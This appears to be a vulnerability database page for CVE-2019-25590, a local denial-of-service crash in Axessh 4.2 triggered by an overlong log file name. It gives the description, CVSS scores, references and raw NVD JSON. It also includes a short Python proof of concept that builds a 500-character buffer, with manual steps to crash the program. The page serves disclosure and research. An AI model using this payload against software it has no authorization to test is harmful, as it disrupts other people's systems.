CVE-2019-25590

Description

Axessh 4.2 contains a denial of service vulnerability in the logging configuration that allows local attackers to crash the application by supplying an excessively long string in the log file name field. Attackers can enable session logging, paste a buffer of 500 or more characters into the log file name parameter, and trigger a crash when establishing a telnet connection.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Axessh 4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2019-25590
# This script generates the payload to crash Axessh 4.2

import sys

def generate_poc():
    # The vulnerability is triggered by a buffer of 500 or more characters
    # in the log file name field.
    buffer_size = 500
    payload = "A" * buffer_size
    return payload

if __name__ == "__main__":
    print("[+] Generating PoC payload for CVE-2019-25590...")
    payload = generate_poc()
    print(f"[+] Payload length: {len(payload)}")
    print("[+] Payload content (first 100 chars):", payload[:100])
    print("\n[+] Instructions:")
    print("1. Open Axessh 4.2")
    print("2. Go to logging configuration and enable session logging")
    print("3. Paste the generated payload into the 'Log File Name' field")
    print("4. Establish a Telnet connection to trigger the crash")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25590
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25590
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25590/
[4] VulDB https://vuldb.com/cve/CVE-2019-25590
[5] http://www.labf.com
[6] http://www.labf.com/download/axessh.exe
[7] https://www.exploit-db.com/exploits/46858
[8] https://www.vulncheck.com/advisories/axessh-denial-of-service-via-log-file-name

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25590", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:24.587", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Axessh 4.2 contains a denial of service vulnerability in the logging configuration that allows local attackers to crash the application by supplying an excessively long string in the log file name field. Attackers can enable session logging, paste a buffer of 500 or more characters into the log file name parameter, and trigger a crash when establishing a telnet connection."}, {"lang": "es", "value": "Axessh 4.2 contiene una vulnerabilidad de denegación de servicio en la configuración de registro que permite a atacantes locales colapsar la aplicación al suministrar una cadena excesivamente larga en el campo del nombre del archivo de registro. Los atacantes pueden habilitar el registro de sesión, pegar un búfer de 500 o más caracteres en el parámetro del nombre del archivo de registro, y desencadenar un colapso al establecer una conexión telnet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1282"}]}], "references": [{"url": "http://www.labf.com", "source": "[email protected]"}, {"url": "http://www.labf.com/download/axessh.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46858", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/axessh-denial-of-service-via-log-file-name", "source": "[email protected]"}]}}